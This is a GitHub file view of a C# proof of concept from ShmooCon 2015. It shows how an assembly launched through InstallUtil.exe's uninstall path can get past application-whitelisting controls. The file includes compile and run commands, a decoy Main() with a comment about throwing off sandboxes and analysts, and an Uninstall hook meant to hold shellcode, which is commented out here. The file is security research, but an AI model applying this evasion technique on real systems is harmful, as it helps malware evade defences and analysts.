forked from gh0std4ncer/ShmooCon-2015
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathPOC.cs
More file actions
61 lines (45 loc) · 2.07 KB
/
Copy pathPOC.cs
File metadata and controls
61 lines (45 loc) · 2.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
//ShmooCon 2015 - InstallUtil.exe Sample Code
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:exeshell.exe exeshell.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
(Or)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().
Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.
We believe the root issue here is:
The root issue here with Assembly.Load() is that at the point at which execute operations are detected
(CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation.
Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection),
which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.
The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.
Its not really an exploit, but just a creative way to launch an exe/assembly.
*/
namespace Exec
{
public class Program
{
public static void Main()
{
Console.WriteLine("Hello From Main...I Don't Do Anything");
//Add any behaviour here to throw off sandbox execution/analysts :)
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello From Uninstall...I carry out the real work...");
//ShellCode.DoEvil();
}
}
}